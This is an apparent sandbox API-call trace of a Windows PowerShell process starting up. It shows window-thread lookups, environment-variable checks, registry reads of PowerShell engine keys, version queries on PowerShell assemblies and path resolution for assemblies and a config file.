	[0550.313] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf80
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xde0
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xddc
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdd8
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd34
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd10
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd0c
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc9c
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc74
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc1c
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc08
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xabc
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x24c
	[0550.314] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xbb0
	[0550.318] WerSetFlags () returned 0x0
	[0552.052] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0552.052] CoTaskMemFree (pv=0x0) 
	[0552.053] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10e140 | out: pulNumLanguages=0x10e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10e140) returned 1
	[0552.053] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10e148, pwszLanguagesBuffer=0x2aee410, pcchLanguagesBuffer=0x10e140 | out: pulNumLanguages=0x10e148, pwszLanguagesBuffer=0x2aee410, pcchLanguagesBuffer=0x10e140) returned 1
	[0552.058] CoTaskMemAlloc (cb=0x24) returned 0x2f7350
	[0552.058] GetUserDefaultLocaleName (in: lpLocaleName=0x2f7350, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0552.058] CoTaskMemFree (pv=0x2f7350) 
	[0552.079] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0552.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.079] CoTaskMemFree (pv=0x2ed7f0) 
	[0552.081] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0552.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.081] CoTaskMemFree (pv=0x2ed7f0) 
	[0552.083] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0552.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.083] CoTaskMemFree (pv=0x2ed7f0) 
	[0553.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.846] SetErrorMode (uMode=0x1) returned 0x1
	[0553.846] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10ddc0 | out: lpFileInformation=0x10ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0553.846] SetErrorMode (uMode=0x1) returned 0x1
	[0553.846] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10e030 | out: lpdwHandle=0x10e030) returned 0x94c
	[0553.848] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2af1ca0 | out: lpData=0x2af1ca0) returned 1
	[0553.849] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dfa8, puLen=0x10dfa0 | out: lplpBuffer=0x10dfa8*=0x2af1d3c, puLen=0x10dfa0) returned 1
	[0553.849] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1e18, puLen=0x10df10) returned 1
	[0553.849] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0553.849] CoTaskMemAlloc (cb=0x2e) returned 0x2f34c0
	[0553.849] lstrcpyW (in: lpString1=0x2f34c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0553.849] CoTaskMemFree (pv=0x2f34c0) 
	[0553.849] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1e6c, puLen=0x10df10) returned 1
	[0553.849] lstrlenW (lpString="System.Management.Automation") returned 28
	[0553.849] CoTaskMemAlloc (cb=0x3c) returned 0x2fa5e0
	[0553.849] lstrcpyW (in: lpString1=0x2fa5e0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0553.849] CoTaskMemFree (pv=0x2fa5e0) 
	[0553.849] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1ec8, puLen=0x10df10) returned 1
	[0553.849] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0553.849] CoTaskMemAlloc (cb=0x20) returned 0x2f7380
	[0553.849] lstrcpyW (in: lpString1=0x2f7380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0553.849] CoTaskMemFree (pv=0x2f7380) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1f08, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0553.850] CoTaskMemAlloc (cb=0x44) returned 0x2fa5e0
	[0553.850] lstrcpyW (in: lpString1=0x2fa5e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0553.850] CoTaskMemFree (pv=0x2fa5e0) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1f70, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0553.850] CoTaskMemAlloc (cb=0x76) returned 0x28f9e0
	[0553.850] lstrcpyW (in: lpString1=0x28f9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0553.850] CoTaskMemFree (pv=0x28f9e0) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af200c, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0553.850] CoTaskMemAlloc (cb=0x44) returned 0x2fa5e0
	[0553.850] lstrcpyW (in: lpString1=0x2fa5e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0553.850] CoTaskMemFree (pv=0x2fa5e0) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af2070, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0553.850] CoTaskMemAlloc (cb=0x58) returned 0x277460
	[0553.850] lstrcpyW (in: lpString1=0x277460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0553.850] CoTaskMemFree (pv=0x277460) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af20ec, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0553.850] CoTaskMemAlloc (cb=0x20) returned 0x2f7380
	[0553.850] lstrcpyW (in: lpString1=0x2f7380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0553.850] CoTaskMemFree (pv=0x2f7380) 
	[0553.850] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x2af1d94, puLen=0x10df10) returned 1
	[0553.850] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0553.850] CoTaskMemAlloc (cb=0x66) returned 0x2e7e40
	[0553.850] lstrcpyW (in: lpString1=0x2e7e40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0553.851] CoTaskMemFree (pv=0x2e7e40) 
	[0553.851] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x0, puLen=0x10df10) returned 0
	[0553.851] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x0, puLen=0x10df10) returned 0
	[0553.851] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10df18, puLen=0x10df10 | out: lplpBuffer=0x10df18*=0x0, puLen=0x10df10) returned 0
	[0553.851] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2af1d3c, puLen=0x10dee0) returned 1
	[0553.851] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0553.851] VerLanguageNameW (in: wLang=0x0, szLang=0x2921e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0553.851] CoTaskMemFree (pv=0x2921e0) 
	[0553.851] VerQueryValueW (in: pBlock=0x2af1ca0, lpSubBlock="\\", lplpBuffer=0x10df38, puLen=0x10df30 | out: lplpBuffer=0x10df38*=0x2af1cc8, puLen=0x10df30) returned 1
	[0553.860] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0553.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0553.860] CoTaskMemFree (pv=0x2ed7f0) 
	[0553.865] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0553.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0553.865] CoTaskMemFree (pv=0x2ed7f0) 
	[0553.870] lstrlenW (lpString="䅁") returned 1
	[0553.880] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10de08 | out: phkResult=0x10de08*=0x2f4) returned 0x0
	[0556.582] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ddf8 | out: phkResult=0x10ddf8*=0x2f8) returned 0x0
	[0556.582] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10de88 | out: phkResult=0x10de88*=0x2fc) returned 0x0
	[0556.586] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ddcc, lpData=0x0, lpcbData=0x10ddc8*=0x0 | out: lpType=0x10ddcc*=0x1, lpData=0x0, lpcbData=0x10ddc8*=0x56) returned 0x0
	[0556.587] CoTaskMemAlloc (cb=0x5a) returned 0x2e7dd0
	[0556.587] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dd9c, lpData=0x2e7dd0, lpcbData=0x10dd98*=0x56 | out: lpType=0x10dd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10dd98*=0x56) returned 0x0
	[0556.587] CoTaskMemFree (pv=0x2e7dd0) 
	[0556.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0556.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0556.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0556.621] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0556.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.621] CoTaskMemFree (pv=0x2ed7f0) 
	[0564.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0564.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0568.654] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0568.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.654] CoTaskMemFree (pv=0x2ed900) 
	[0568.656] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0568.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.657] CoTaskMemFree (pv=0x2ed900) 
	[0570.124] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0570.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.124] CoTaskMemFree (pv=0x2ed900) 
	[0570.126] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0570.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.126] CoTaskMemFree (pv=0x2ed900) 
	[0570.127] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0570.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.127] CoTaskMemFree (pv=0x2ed900) 
	[0573.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0573.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0574.879] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0574.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.879] CoTaskMemFree (pv=0x2ed900) 
	[0574.882] CoTaskMemAlloc (cb=0x104) returned 0x2ed900
	[0574.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.882] CoTaskMemFree (pv=0x2ed900) 
	[0576.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0576.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0592.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0595.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0595.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0599.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0599.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0603.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0603.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0604.792] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0604.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.792] CoTaskMemFree (pv=0x2edb20) 
	[0606.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0606.922] SetErrorMode (uMode=0x1) returned 0x1
	[0606.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10dd60 | out: lpFileInformation=0x10dd60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0606.922] SetErrorMode (uMode=0x1) returned 0x1
	[0611.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
